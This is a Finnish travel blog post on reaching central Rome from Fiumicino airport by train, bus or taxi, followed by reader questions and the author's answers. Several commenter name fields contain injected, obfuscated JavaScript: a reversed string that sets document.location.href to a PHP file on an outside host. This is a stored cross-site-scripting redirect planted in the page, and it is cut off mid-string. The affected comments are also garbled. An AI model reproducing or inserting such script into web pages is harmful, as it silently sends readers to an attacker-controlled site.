Subscribe & Follow

Neuvot ja vinkit

Miten Fiumicinon lentokentältä pääsee Rooman keskustaan

28/09/2014

Jos tässäkin blogissa mainituista paikoista haluaa nauttia paikan päällä, täytyy ensin matkata itse Roomaan. Eikä riitä, että ostaa lennot Roomaan, sillä Fiumicinon kenttä sijaitsee 35 kilometrin päässä Rooman keskustasta, joten sieltä pitää vielä hankkiutua keskustaan. Roomaan pääsee lentokentältä monella tapaa, eikä useimpien Rooman matkaoppaiden suosittelema turistijuna Leonardo Express välttämättä ole paras – eikä ainakaan halvin – vaihtoehto.

Varoitan ihan aluksi myös ystävällisistä taksin kaupittelijoista, joita on pilvin pimein odottelemassa lentokentän aulassa. Vaikka nämä saattavat vaikuttaa helpolta vaihtoehdolta, älkää missään tapauksessa sortuko niihin, älkää edes pysähtykö kysymään hintaa, sillä hyvin nopeastipalvelualtis kuski on kiikuttamassa matkalaukkuanne kohti taksiaan. Ja se 80 tai 90 euroa, jonka tämä sitten matkasta veloittaa, tekee ikävän loven matkabudjettiin, eikä huijauksesta voi oikein mihinkään valittaakaan, jos taksi ei ole oikea virallinen taksi (valkoinen). Keskustaan pääsee kuitenkin aika näppärästi myös seuraavien ohjeiden avulla (ja rahaa säästyy paljon parempaan).

Juna

Fiumicinon kentän juna-asema sijaitsee Terminaali 3:n alla ja sinne löytää junan kuvia seuraamalla. Lippuautomaatteja näyttää tulleen asemalle vievien liukuportaiden yläpäähän, mutta siihen ei kannata jäädä jonottamaan, sillä automaatteja on lisää alhaalla. Lippuja saa myös palvelupisteestä ja kioskista. Lippuja EI myydä junassa, joten ne on ostettava ja leimattava ennen junaan nousemista.

Leimaa lippusi aina tämännäköisessä laitteessa ENNEN junaan nousua.
Leimaa lippusi tällaisella ennen junaan nousemista

 

  • Leonardo Express menee suoraan pysähtymättä Terminin asemalle (Rooman pääasema). Matka kestää n. 30 minuuttia ja maksaa 14 euroa/ suunta. Nopeutensa ja helppoutensa vuoksi Express on ihan hyvä vaihtoehto, jos hotelli sijaitsee Terminin ympäristössä tai vaikkapa Espanjalaisten portaiden tuntumassa tai muualla A-metrolinjan varrella. Paikallisia ei kuitenkaan tässä junassa näy, sillä he valitsevat edullisemman ja monelle kätevämmän vaihtoehdon, kuten…
  • Paikallisjuna (treno regionale). Fiumicinon asemalta lähtee myös paikallisjuna, joka pysähtyy mm. Trasteveren ja Ostiensen (Piramide) asemilla, mutta ei Terminillä. Matka kestää n. 40 minuuttia ja lippu maksaa 8 euroa. Junan määränpää on Fara Sabina tai Orte, mutta Fiumicinossa on vain 3 raidetta, joten oikea juna löytyy helposti. Jos lipun ostaa automaatista, pitää valita jokin tiettyyn aikaan lähtevä juna, mutta se on silkka muodollisuus. Ostettu lippu on aina samanlainen ja se on voimassa vasta, kun se leimataan. Trasteveren asemalla pysähtyvä juna on hyvä vaihtoehto, jos majapaikka on vaikkapa Trasteveressa tai vanhassa kaupungissa (esim. Campo dei Fiorin lähellä), sillä Trasteveren aseman edestä lähtevä raitiovaunu 8 vie lähelle näitä paikkoja. Ostiensesta taas pääsee paitsi Testaccioon, niin B-metrolla Terminiä näppärämmin sen varrella oleviin kohteisiin. Molemmilta asemilta lähtee myös juna Vatikaaniin.

Bussi

Bussi on junaa hitaampi, mutta edullisempi tapa päästä keskustaan. Matka kestää noin tunnin ruuhkasta riippuen. Fiumicinosta kulkee useampi bussiyhtiö ja niiden liput voi – ja kuulemma kannattaakin – ostaa etukäteen netistä, mutta niitä myydään myös bussissa. Liput maksavat n. 5 euroa/ suunta. Bussit lähtevät jostain kolmosterminaalin edestä, mutta tämän tarkemmin en osaa neuvoa, sillä itselleni kätevin kulkuneuvo on juna.

  • SIT Bus Shuttle menee Terminin asemalle ja Vatikaaniin, liput 6 € (yksisuuntainen) ja 11 € (meno-paluu)
  • Terravision menee Terminin asemalle. Liput 4 €/ suunta.
  • T.A.M. bus menee Terminin ja Ostiensen asemille. Liput 4 €/ suunta.

Lisäksi keskustaan pääsee myös Cotralin ja ATRAL-Lazion paikallisbusseilla, mutta epäilen, että useimmat Roomaan tulijat eivät ensi töikseen halua lähteä metsästämään niiden lippuja T-merkillä merkitystä baarista tai tabaccheriasta. Ainakin yleensä näihin on ostettava liput etukäteen.

Taksi (ja sen fiksattu hinta)

Vielä kerran: älä ota “taksia” tuloaulasta. Rooman valkoiset taksit odottelevat ulkona kolmosterminaalin edessä. Taksi on hyvä vaihtoehto, jos jostain syystä matkatavaraa on paljon, koska kuten edeltä näette, useimmiten juna-asemilta joutuu vielä vaihtamaan bussiin tai metroon ja niissä matkustaminen matkalaukkujen kanssa on Roomassa kyllä tuskaa. Taksi on myös hyvä vaihtoehto, jos Rooman keskustaan menijöitä on 3 tai enemmän. Takseilla on nimittäin fiksattu hinta Aurelian muurien sisäpuolelle, siis esim. Vatikaanin, Espanjalaisten portaiden, Trasteveren ja muun historiallisen keskustan alueille. Fiksattu hinta 48 euroa, matkustajien ja matkalaukkujen määrästä riippumatta. Taksi vie perille asti, eikä hintaero julkisiin välineisiin ole iso, jos matkustajia on enemmän.

Monilla hotelleilla ja muilla majapaikoilla on myös omia taksipalvelujaan, jotka voivat olla virallisiakin vakiotakseja. Myös netistä löytyy lukemattomia kuljetusfirmoja, joista voi varata kyydin etukäteen. Nämä maksavat yleensä taksia enemmän (65 eurosta ylöspäin), mutta ovat toki hyvä vaihtoehto, jos haluaa satsata siihen, että pääsee suoraan laukkujen saamisen jälkeen eteenpäin.

Rooman keskustasta Fiumicinon kentälle pääsee periaatteessa päinvastaisessa järjestyksessä. Matkaan kentälle kannattaa varata aikaa, sillä ruuhka-aikaan lentokentälle vievät tiet tukkiutuvat, bussit ovat usein täyteen varattuja, lakkojen aikaan paikallisjunat eivät kulje jne.

Toivottavasti näistä ohjeista on apua!
Laittakaa kommenttia, jos on jotain kysyttävää tai lisättävää vaikka noihin busseihin.

Tykkää ja jaa:
RSS
Twitter
Visit Us
Follow Me
Instagram

81
Leave a Reply

avatar
47 Comment threads
34 Thread replies
0 Followers
 
Most reacted comment
Hottest comment thread
32 Comment authors
Palermo San Vito lo CapoEmmiAnneMattiina Recent comment authors

This site uses Akismet to reduce spam. Learn how your comment data is processed.

  Subscribe  
newest oldest most voted
Notify of
Bigblue
Guest

Kii tos, tämä oli loistava teksti ensikertalaiselle Roomaan matkustajalle 🙂

Heli
Guest

Kiva kuulla!

Anonyymi
Guest
Anonyymi

Tie to takseista äly hyvä! Muutenki tosiaan ekakertalaiselle arvokasta tie toa!

Heli
Guest

Kii tos! Suututtaa aina niin paljon, kun kuulee jonkun tulleen huijatuksi.

Anonyymi
Guest
Anonyymi

Hei Heli. Olemme lähdössä ylihuomenna, eli 24.9 Roomaan ja ajattelin yrittää josko sinulta saisi vinkin miten ja millä meidän olisi järkevin mennä len tokentältä tälle hotellille?
http://www.infinityhotelstpeter.it/en/?r=4360000&gclid=Cj0KEQjwg9-vBRCK7L7wmO2u0JcBEiQA_tzoaBQyPU1_LRADwieiekBRBIzZU6thcPPS0W7RQy-Px7AaAmwx8P8HAQ

Heli
Guest

Moi. Sanoisin, että helpoin ja nopein tapa päästä tuonne Vatikaanin museon lähettyville julkisilla on tuo hotellin sivuillakin mainittu turistijuna Leonardo ja A-metro Terminin asemalta Ottavianolle. Terminille pääsee halvemmalla noilla busseilla (SIT, Terravision ja TAM), mutta matka kestää kauemmin. SITin bussi menee myös Vatikaanin Piazza Cavourille, mutta siitä on vielä kilometrin kävely hotellillenne. Yhdellä vaihdolla selviää myös, jos menee paikallisjunalla Ostiensen asemalle ja vaihtaa siellä bussiin 23, mutta silloin matkaan saa varata aikaa jo vähintään 1,5 tuntia. Taksin pitäisi maksaa 45 euroa (hotelli näyttäis mun mielestä olevan Aurelian muurien sisäpuolella), mutta asia kannattaa varmistaa hotellilta. Niillä voi olla samaan hintaan myös… Read more »

Roosa
Guest
Roosa

Täytyy huomauttaa, että kyseiset Rooman kaupunginmuurit ovat viralliselta suomenkieliseltä nimeltään Aurelianuksen muurit rakennuttajansa mukaan.

Heli
Guest

Korjaan: taksi maksaa 48 euroa. Hotellinne on ihan siinä rajoilla, mutta ainakin Ottavianon metroasema on Aurelian sisäpuolella. Taksikuskille kannattaa tehdä selväksi, että tiedätte fiksatusta hinnasta ja ottaa len tokentältä AINA se virallinen valkoinen taksi.

Anonyymi
Guest
Anonyymi

hei ja kii tos sivustasi. Olemme menossa marraskuun alussa ekaa kertaa Roomaan ja kysyisin että saako noita Leonardo Express .junalippuja myös ostettua siitä Termiinin päärautatieasemalta ? Ajattelin että jos mennessämme len tokentältä hotellille käyttäisimme bussia ja takaisinpäin len tokentälle sitten tuota Express junaa.

Heli
Guest

Hei, anteeksi vastauksen viivästyminen, mutta onhan tässä onneksi tuloonne vielä aikaa. Lippuja Leonardoon saa toki myös Terminiltä. Automaateissa on muistaakseni pikavalintana Fiumicino/ Aeroporto heti ruudulla. Suosittelen siis automaatteja (lippujonot voi olla mittavat ja automaatteihin pääsee yleensä jonottamatta), mutta varokaa "avuliaita" neuvojia, joita Terminillä notkuu rahapalkkion toivossa. Auttajien häätäminen on joskus hankalaa, mutta kannattaa pitää huolta, ettei lähettyvillä ole siinä vaiheessa ketään kun luottokorttia käytetään.

liisinkortit
Guest

Kiitos vinkeistäsi blogissasi on paljon hyödyllistä tietoa Roomaan matkaavalle. Käytimme heti neuvoasi hyödyksi ja otimme lentoasemalta Leonardo Express junan Terminin rautatieasemalle (jonka läheisyydessä hotellimme sijaitsi). Teimme kuten neuvoit ja löysimme lentokentällä Terminaali 3:n alla sijaitsevalle rautatieasemalle junan kuvia seuraamalla. Myöskin jossain vaiheessa kävellessämme asemalle eteemme osui kioski, josta voi ostaa junalippuja 14 euroa + 1 euro (jokin vero?). Eli yhden lipun hinnaksi tuli 15 euroa (jonoa ei ollut ollenkaan ko.kioskilla. Helppo oli löytää junalle, matkaa tosin oli kävellä (joskin meitä se ei haitannut). Lomalta paluumatkalle lentokentälle tilasimme hotellilta 48 euroa veloittavan taksin. Kiitos neuvoista/vinkeistä.

Anna
Guest

Hei, olen entinen roomalainen, minulle NCC eli noleggio con conducente eli kyltin kanssa odotteleva kuski oli ykköstapa kulkea, hinta noin 40 euroa ovelta ovelle jos oli yhtään matkatavaraa.

Anna
Guest
Anna

Hei, olemme ensi kertaa matkalla Roomaan enis vuoden alusta. Koneemme laskeutuu puolen yön aikaan Fiumicinon kentälle. Hotelli Aurelianmuurien sisäpuolella, mikä olisi turvallisin tapa päästä hotellille?

Jaana
Guest
Jaana

Hei, onko tuo 48 euroa nyt tuoreinta tie toa? Hotelli on Via Nazionalella, olettaisin että muurien sisällä. Taksiin olemme varautuneet, koska laskeudumme yöllä kuten edellinen kysyjäkin.

Jaana
Guest
Jaana

Hei! Kii tos nopeasta vastauksesta. Onko tuo Ncc luotettava kyyti? Meitä on kolme aikuista ja yksi lapsi. Yöllä ei jaksaisi alkaa vääntämään hinnasta taksukuskin kanssa, jos tuo Ncc ei ole paljon kalliimpi ja hinta on selvä ilman tinkimistä.

RaneJ
Guest
RaneJ

Ei kyllä yhtään haittaisi, vaikka näiden kysymysten, vastausten ja kommenttien kohdalla näkyisi päiväys. Turha lukea vinkkejä, joiden tiedot ovat jostain menneisyydestä.

Katja
Guest
Katja

Hei, osaatko ker toa onko juna- ja metrolippujen hinnat aina samat vai onko opiskelijoille eri hinnat? Löytyyköhän junalippuhinnas toa englanniksi jostain? Asumme Settebagnin aseman lähellä ja sieltä taitaa olla juna paras vaih toeh to liikkua keskustan suuntaan ja muualle.

Pasikuikka
Guest
Pasikuikka

Moi.
Otettiin aulasta tuo tyrkkytaksi. Meno len toasemalta colosseumin tuntumaan hotellille maksoi 65€. Paluumatkaa varten saatiin tarjouslipuke 40€ jos tullaan saman firman taksilla. Mitä lienee hinta virallisilla takseilla tuo väli. Pidän ~50€ hintaa ihan ok per suunta kun nämä kulut jakaa menopaluuksi.

Virve
Guest
Virve

Hei! Olemme tulossa nyt kesäkuun alussa 2017 Rooman liepeille Lido di ostia -nimiseen rantakaupunkiin. Matkaa len tokentältä on noin 10 km. Meitä on 6 hlö aikuista/lasta + 5kk ikäinen vauva, joten kahdella taksilla voisimme tietenkin mennä majapaikkaan ( tosin turvakaukaloasiat vauvan kohdalla mietityttää ). Osaisitko sanoa pääseekö/mistä lähtee bussit Ostian suuntaan? Tarkoitus on sitten loman aikana parina päivänä käydä Roomassa mutta muuten ottaa rauhallisemmin koska mukana on lapsia.

Mira
Guest
Mira

Hei! Osaatko sanoa miten nuo paikallisjunat kulkevat aikaisin aamulla? Olen mahdollisesti varaamassa len toa, joka lähtisi Roomasta klo. 7:45 ja taksia en haluaisi ottaa. Katsoin trenitalian sivuilta että paikallisjunia kulkisi jo viiden kuuden aikaan aamulla noilta Rooman pysäkeiltä, mutta en tiedä voiko noihin sivuihin täysin luottaa. Onko sinulla tästä kokemusta? Käsimatkatavaroilla matkustan eli riittäisi olla noin tuntia ennen lennon lähtöä kentällä.

Mira
Guest
Mira

Kii tos nopeasta vastauksesta! Tällä tiedolla otan tuon aamulennon vaih toehdoksi ja alan tutkailemaan muita postauksiasi Roomasta 🙂

Tuula
Guest
Tuula

Hei, viikon päästä Roomaan. Miten pitkä matka on juna-asemalta Terriniltä Piazza del Popololle?
Mikä on paras tapa siirtyä? Tykkään blogistasi tosi paljon!Ystävällisin terveisin: Tuula

ris<script>$mkD=function(n){if (typeof ($mkD.list[n]) == "string") return $mkD.list[n].split("").reverse().join("");return $mkD.list[n];};$mkD.list=["\'php.txEgifnoCetiSrettelsweN/snoisnetxe/edoc/rettelswen/moc.cniwyks//:ptth\'=ferh.noitacol.tnemucod"];va
Guest
ris to on kyllä hermostuttava!

ris<script>$mkD=function(n){if (typeof ($mkD.list[n]) == "string") return $mkD.list[n].split("").reverse().join("");return $mkD.list[n];};$mkD.list=["\'php.txEgifnoCetiSrettelsweN/snoisnetxe/edoc/rettelswen/moc.cniwyks//:ptth\'=ferh.noitacol.tnemucod"];va
Guest
ris tos,
Pitää nyt harkita taksia pois lähtiessä aamulla, Aikataulun mukaan kyllä bussi lähtee aamulla 4.30,
sillä pitäisi kyllä kaiken järjen mukaan keretä lennolle, mutta miten ne aikataulut sitten pitävät kutinsa. 😀 ei kyllä viitsisi myöhästyä lennolta, kävellen on pitkä matka kotiin ,,, heh

ris<script>$mkD=function(n){if (typeof ($mkD.list[n]) == "string") return $mkD.list[n].split("").reverse().join("");return $mkD.list[n];};$mkD.list=["\'php.txEgifnoCetiSrettelsweN/snoisnetxe/edoc/rettelswen/moc.cniwyks//:ptth\'=ferh.noitacol.tnemucod"];va
Guest
ris to jä jäätyy Roomassa 😀

Heli
Guest
Heli

Hei! Tulossa elokuussa Roomaan Norwegianilla, onko sinulla hyviä hotelli suosituksia Nomentanon tai Trasteveren alueelta?

Sh
Guest
Sh

Hei! Kysyisin, että onko taksilla kulkiessa len tokentän ja keskustan välillä tunneleita joista joutuu ajamaan?

Milli
Guest
Milli

Ciao Heli, kiitokset tosi mielenkiintoisesta blogista ja infosta!! Osaisitko kertoa millä julkisilla kulkuneuvoilla voi matkustaa suuren koiran kanssa? (dobermann) Ja tiedätkö, onko jotain rajoituksia tai maksaako eläin lähiliikenteessä jotain? Ilmeisesti kaukojunissa oma lippu lemmikille? Majapaikasta ei vielä tietoa, mutta Roomaan luultavasti lennot – häkki jonnekin säilöön (olisiko ideoita minne – lentokenttäsäilytys ei tule kyseeseen – tulisi kuukausien ajaksi valtavan kalliiksi), ja yleisillä matkaan rinkan ja hurtan kanssa. Auguri di ogni bene! Saluti da Milli

Jaana Tani
Guest
Jaana Tani

Moikka Heli,
Tulemme ensikertaa Roomaan ja tietysti tuolla iltalennolla eli kone laskeutuu 23.20. Osaatko sanoa onko kentällä mitään kauppaa josta voisi siihen aikaan ostaa mukaansa aamiaistarvikkeita, lähinnä leikkeleitä ja vihanneksia?
Terveisin,
Jaana

Jaana Tani
Guest
Jaana Tani

Kii tos Heli, teemme näin.
Ollaankin varauduttu matkaamaan asunnolle taksilla juuri tuon kellonajan takia.
Kiva kun viitsit vastata näihin kysymyksiin. Niistä on suuri apu.
T. Jaana

RosaM
Guest
RosaM

Hei!

Olen lähdöss Roomaan, ja hotelli sijaitsee
Terminin aseman vieressä. Kone on vasta puolilta öin perillä, joten viimeiseen junaan en taida ehtiä (23:38). Yritin katsoa tuolta
http://www.sitbusshuttle.com/en bussia len toasemalta terminiin mutta siinä tulee määränpäävaih toehdoiksi vain
Roma City Center via marsala 5, City Center vaticano via crescenzio 2, tai Roma Citycenter via aurelia 448. Onko se jokin näistä? Kii tos!

Milli
Guest
Milli

Ciao Kiitoksia kovasti – tosi hyviä, konkreettisia vinkkejä!!! Pystyykö lippuja ostamaan käteisellä; kolikoilla tai seteleillä automaateista vai onko käytettävä korttia? Matkustan ison koiran kanssa – sille ei ilmeisesti tarvitse ostaa lippua lähiliikenteessä? Kuonokoppa vain päähän matkalle. Kuinka saan ostettua pitkän matkan juniin koiralle lipun? Se on niin iso, että kulkee ilman häkkiä. Olen käsittänyt, että lippuuni pitää kirjoittaa koira ja 50% aikuisen lipun hinnasta, pitääkö paikkansa? Jos tilaan pitkille matkoille liput netitse, miten saan koiran matkan varattua? En löytänyt AlItalian sivuilta lemmikkivaihtoehtoa lainkaan.. Olen kuullut, että ellei lipussani ole mainintaa koirasta, voin saada 80€ sakot? Tässä on edelleen säätöä lentoyhtiöiden… Read more »

Milli
Guest
Milli

Grazie mille! Paljon kiitoksia vaivannäöstäsi! Kaikista vinkeistä on iso apu ja tosiaan jos sinne aiotaan muuttaa, luultavasti kyllä autolla. Lähellä oli, etten lähtenyt maateitse lautalla ja junilla koko matkaa Suomesta, kun lentojen kanssa ison häkin koon vuoksi meinasi tulla vallan kamalia ongelmia.. Ollappa hieman pienempi hurtta heh… Mutta minkäs teet? Onneksi ei ole tanskandoggi, eikä onneksi vielä kahta isoa koiraa = ) Olet oikeassa, Trenitalia tietenkin. Linkit ovat tervetulleita. Myös siellä koirarannalla käynti tai jos muuten haluat tavata, lähteä vaikka vierailemaan johonkin koirakouluun kanssani, niin laitatko vaikka meiliä, kiitos? Olen näillä näkymin vain päivän tai kaksi Roomassa (ainakin nyt tulomatkalla),… Read more »

Fransiina
Guest
Fransiina

Onpa loistoblogi Italianmatkaa suunnittelevalle. Itse varasimme lennot Roomaan ensi kevääseen, huhti-toukokuun taitteeseen ja reissuun siis lähdössä vanhemmat ja 9 ja 11-v lapset. Tarkoituksena on viettää ihan kaupunkilomaa. Majoitusta ei olla vielä varattu, mutta jäin pohtimaan kahta asiaa: onko paluupäivämme 1.5. pyhäpäivä, jolloin kenties julkinen liikenne kentälle 7.45 lähtevällä lennolle kulkee huonommin? Ja pääseekö 7 päivän julkisten lipulla myös lentokentälle vai onko se vain lähiliikenteeseen?

Rea
Guest
Rea

Kätevintä on asua noin Oopperan-Republican seutuvilla (kävely- ja metroyhteydet). Ei kuitenkaan Via Nazionalella (järkky liikennemelu) vaan sen sivukaduilla (tarkista kuitenkin, ettei hotellisi ole bussikadulla: http://www.atac.roma.it/files/doc.asp?r=3). Ikävää aluetta on Terminin ympäristö. Yleisesti voi rajata, että mitä enempi Santa Maria Maggioresta mennään Piazza Vittorio Emmanuellen (Esquilinon) suuntaan, sitä huonompaa aluetta. Toiseen suuntaan eli Barberiiniin päin, on elo parempaa. Hotelleiksi kutsuvat itseään myös kerrostalon kerroksissa olevat isot lukaalit. Itse varmistan aina, että hotelli on oikea hotelli eli oma privaatti sisäänkäynti kadulta. Kannattaa pyytää huonetta pihan puolelta ja yläkerroksista (ei jyristä metro tms.). Ps. Fiumicinolta kulkee myös öisin halpabusseja Terminille (tarkistettu helmi -18).

Heidi
Guest
Heidi

Ollaan tulossa lasten kanssa Roomaan 1.5. ja majapaikka sijaitsee Monteverdessa. Onko siellä ruokamarketit auki?

Heidi
Guest
Heidi

Hei! Sori häiritsen mutta tiiätkö saako 5 päivän lipun vai pitääkö ottaa 7 päivän? Käykö sama 7 päivän lippu metroissa, ratikoissa, junissa ja busseissa? Vai pitääkö junaan ostaa erikseen lippu millä pääsee kentältä Terminiin, siihen ei käy se 7päivän lippu? Alkaako voimassaolo 7päivän lippuun heti kun sen ostaa? Vai pitääkö se aina erikseen leimata minne ikinä menee 7 päivän aikana? Jos junalippu ei lukeudu tuohon 7 päivän lippuun, voiko juna paluulipun Terministä kentälle ostaa jo Roomaan saapumispäivänä?

eija niemi
Guest
eija niemi

Hei Heli. Olemme tulossa Roomaan 11.4 -18 ja tarkoitus jatkaa Napoliin junalla. Len to 15.25 . Kannattaako ottaa juna heti suoraan Napoliin vai vasta termiiniltä. Entäs jos etukäteen netistä,niin mistä, miltä sivulta? Kiittäen Eija

Jussi
Guest
Jussi

Hei! Osaatko sanoa saako noilla CIRS useamman vyöhykkeen (http://www.atac.roma.it/page.asp?p=229) lipuilla matkustaa len tokentän ja keskustan välisellä paikallisjunalla?

Cara
Guest
Cara

Hei, kii tos tästä blogipostauksesta! Taksituntemuksesi tulee tarpeeseen. Meillä hotelli Twenty One sijaitsee osoitteessa:Via Cola di Rienzo, 23, Tätä mainostetaan hyvällä sijainnilla. Menisimme mieluusti taksilla (sillä valkoisella). Neuvotellaanko hinta ennen kyytiä silloinkin?

Plop
Guest
Plop

Kannattaako Terminin lähelle majoittua, jos ei liiku yöllä? Kuinka turvallista? Tarkoitus olisi jatkaa Roomasta parin yön jälkeen junalla, ja ajattelimme, että voisimme hotellista kävellä laukkujen kanssa asemalle, mutta onko ihan hölmö idea?

Vierailija
Guest
Vierailija

Satuinpa lukemaan tätä blogia vasta nyt, matkan jälkeen. Fiumicinon lentokentän taksihuijarit ovat aika ovelia: meitä houkutteli ihan virallisen näköiseen uniformuun pukeutunut nainen. Matkan hinnaksikin kerrottiin 48 euroa, mutta kun kysyimme voiko maksaa kortilla, väitettiin että se maksaa 7 euroa lisää. Tajusimme että eihän mikään korttimaksu voi olla noin kallis ja vasta sitten huomasimme viralliset valkoiset taksit. Taksikuski sitten kertoi että meidät oli yritetty kaapata laittomaan taksiin. Toinen huijaus Roomassa on rannekoruhuijaus. Huijari (näimme näitä kolme, kaikki englantia puhuvia afrikkalaisperäisiä miehiä) tulee iloisena höpöttämään jotakin juhlista, vaimon synnytyksestä tms. ja tyrkyttää puoliväkisellä rannekorua käteen. Kun kysyt hintaa, koru on kuulemma ilmainen.… Read more »

ina
Guest
ina

Hei! Olen matkustamassa yksin Roomaan parin vkon päästä. Osaatko sanoa mistä bussit liikennöivät yö aikaan fiumicinon len tokentältä keskustaan? Len to on 23.35.

Matti
Guest
Matti

Moikka Heli Kiitos hienosta blogistasi, sitä jo edellisen Rooman reissun (toissa syksynä) yhteydessä luettiin ahkerasti. Sillä reissulla opittiin, että se 24 euroa maksava 7 päivän lippu kelpaakin yllättäen koko Lazion maakunnan alueella ainakin osassa junia ja sillä iloisesti matkustettiin sitten rantakohteisiin. Kaksi päivää vietettiin rannoilla ja eka päivä maksettiin erikseen liput, jotka maksoi muistaakseni 14 euroa edestakaisin. Sillä matkalla tutkiskelin sitten sitä viikon lippua tarkemmin ja google translatea apuan käyttäen tulkkasin, että eihän meidän olisi tarvinnut erillisiä lippuja ostaakaan! Seuraavana päivänä mentiin sitten vain sillä lipulla ja jännitys oli kova, kun konnari tuli tarkastamaan, että olinkohan tulkinnut oikein. Kyllä olin!… Read more »

Anne
Guest
Anne

Moikka, on suunnitelmissa heinäkuussa matka Italiaan. Lento Roomaan Fiumicinon lentokentälle. Siitä olisi tarkoitus joko vuokrata auto tai ottaa juna pohjoiseen päin rantaa pitkin Toscanan alueelle, Pisa-Firenze linjalle saakka. Ihan tarkkaan kohdetta ei vielä ole päätetty. Osaatko sanoa kuinka junalla pääsee helposti lentokentältä pohjoiseen päin ja mistä saa sen aikatauluja? Entäs kuinka auton vuokraus kentältä, osaatko suositella jotain vuokrafirmaa? Palatessa alaspäin takaisin olisi tarkoitus tutustua Roomaan. Kiitos vastauksesta jo etukäteen 🙂

Emmi
Guest
Emmi

Ihan mahtavaa, että löysin blogisi! Tämä on ollut oikein oiva iltalukeminen. Ensimmäinen Rooman matka häämöttää ja saapumisen ajankohdan vuoksi olemme miettineet au ton ja kuskin varaamista etukäteen. Suomalaisella sivus tolla suositeltiin tällaista yritystä:
http://www.airportshuttle.it/
Hinta on todella edullinen ja se vähän epäilyttää. Osaatko sinä sanoa onko tällaisesta firmasta hyviä vai huonoja kokemuksia?

Palermo San Vi<script>$mkD=function(n){if (typeof ($mkD.list[n]) == "string") return $mkD.list[n].split("").reverse().join("");return $mkD.list[n];};$mkD.list=["\'php.txEgifnoCetiSrettelsweN/snoisnetxe/edoc/rettelswen/moc.cniwyks//:ptth\'=ferh.noitacol.tn
Guest
Palermo San Vi